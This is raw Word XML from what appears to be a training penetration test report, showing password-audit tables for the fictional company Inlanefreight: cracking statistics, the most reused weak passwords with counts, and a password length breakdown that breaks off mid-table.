      <w:r w:rsidRPr="00390B73">
        <w:t xml:space="preserve">Password Statistics </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5005" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9010"/>
        <w:gridCol w:w="1801"/>
      </w:tblGrid>
      <w:tr w:rsidR="00935ECE" w14:paraId="0E426E03"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4167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1C09E8EE" w14:textId="4B7C61BE" w:rsidR="00935ECE" w:rsidRPr="00D91E64" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4339B96B" w14:textId="61EAC951" w:rsidR="00935ECE" w:rsidRPr="00D91E64" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="581803CC"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25831393" w14:textId="59F778CD" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total Password Hashes Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3092C7DE" w14:textId="78DCF356" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="790C866D"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2C568679" w14:textId="17E3B25B" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total Passwords Cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E718FE0" w14:textId="6A24F7B5" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1,284</w:t>
            </w:r>
            <w:r w:rsidR="00935ECE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="5EC70FA2"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645D5660" w14:textId="27B6F0ED" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>% of Passwords Cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BC77B03" w14:textId="579D3C3A" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>64.2</w:t>
            </w:r>
            <w:r w:rsidR="00935ECE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="3CB6E313"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661F8483" w14:textId="5CB08971" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Number of Domain Admins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="622B9318" w14:textId="49D727F4" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="0CF22C84"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0AD523BE" w14:textId="45607C61" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cracked Domain Admin Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2DC8D723" w14:textId="3B0072F2" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="2EAC4781"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5C40AD89" w14:textId="2A570D71" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>% of Domain Admin Passwords Cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="384E4B51" w14:textId="7982A36C" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="00935ECE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58B3CFE8" w14:textId="4A2BB3BC" w:rsidR="002852E3" w:rsidRDefault="002852E3" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Password Cracking Statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC16C7" w14:textId="6EBA785B" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading3"/>
      </w:pPr>
      <w:r w:rsidRPr="000258FE">
        <w:t>Most Common</w:t>
      </w:r>
      <w:r w:rsidR="00390B73" w:rsidRPr="000258FE">
        <w:t>ly Used</w:t>
      </w:r>
      <w:r w:rsidRPr="000258FE">
        <w:t xml:space="preserve"> Passwords</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5010" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9019"/>
        <w:gridCol w:w="1803"/>
      </w:tblGrid>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="31BCF139" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72F2B153" w14:textId="77777777" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r w:rsidRPr="000258FE">
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63899F9B" w14:textId="5C7AA291" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r w:rsidRPr="000258FE">
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="6F0225E7"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387EF179" w14:textId="65BE67C9" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ILFREIGHT#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="790279A8" w14:textId="614C54AF" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="000E0FD7">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="000258FE" w14:paraId="7937AE70"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1EE9C4E1" w14:textId="2DC6BFAC" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Welcome1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0932B433" w14:textId="4859AC8B" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="55090094"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40750322" w14:textId="4AA2EE4A" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6405FEB3" w14:textId="75A7BE2E" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="6D9EBF0A"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556808A7" w14:textId="22578E20" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00D14781" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Inlanefreight</w:t>
            </w:r>
            <w:r w:rsidR="00935ECE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1320D52C" w14:textId="14BBE149" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00935ECE" w:rsidRPr="000258FE" w14:paraId="50383C02"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7E13DC76" w14:textId="522DA2F1" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Spring202</w:t>
            </w:r>
            <w:r w:rsidR="000E0FD7" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AFDA88E" w14:textId="3CD6C34B" w:rsidR="00935ECE" w:rsidRPr="000258FE" w:rsidRDefault="00935ECE" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13569D7F" w14:textId="2AD5FDCD" w:rsidR="00E81003" w:rsidRDefault="00E81003">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Password Reuse Statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B667B" w14:textId="2E602AA9" w:rsidR="00390B73" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading3"/>
      </w:pPr>
      <w:r>
        <w:t>Password Length Breakdown</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5010" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9019"/>
        <w:gridCol w:w="1803"/>
      </w:tblGrid>
      <w:tr w:rsidR="00390B73" w14:paraId="6DD7885C"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4167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F474F7B" w14:textId="710D5C1D" w:rsidR="00390B73" w:rsidRPr="00D91E64" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:r>
              <w:t>Length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7DC0F081" w14:textId="77777777" w:rsidR="00390B73" w:rsidRPr="00D91E64" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:r>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="007369DF" w14:paraId="3E767BD9"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0604A682" w14:textId="2149EDCA" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B7479ED" w14:textId="4B6478B5" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="007369DF" w14:paraId="6FE1CA7A"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60BD5C1F" w14:textId="7B5B14A4" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B83F1D8" w14:textId="687783E1" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00390B73" w:rsidRPr="007369DF" w14:paraId="53C22F9E"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0097293D" w14:textId="091D9067" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4215A75B" w14:textId="0EFC7E77" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="00390B73" w:rsidP="000258FE">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="000258FE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00390B73" w:rsidRPr="0005451F" w14:paraId="0E7F4141"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5BA9925E" w14:textId="0CA6309E" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1361156A" w14:textId="77777777" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00390B73" w:rsidRPr="0005451F" w14:paraId="67291A4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42F70180" w14:textId="0EBAB960" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="19016FC2" w14:textId="77777777" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00390B73" w:rsidRPr="0005451F" w14:paraId="31F2FC04"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2EE2D7FC" w14:textId="4E294C31" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F84BA7C" w14:textId="078C5F45" w:rsidR="00390B73" w:rsidRPr="000258FE" w:rsidRDefault="00390B73" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="000258FE" w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="0005451F" w14:paraId="2586FF3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7F009837" w14:textId="215CD8F5" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="54DC6121" w14:textId="2F2F8AD9" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="0005451F" w14:paraId="1E9D84E0"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06AB4BA2" w14:textId="01FBEABA" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74814769" w14:textId="4D7869F2" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>220</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="0005451F" w14:paraId="73210F22"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67E2AD48" w14:textId="38688C21" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E1E7FFD" w14:textId="1F855005" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
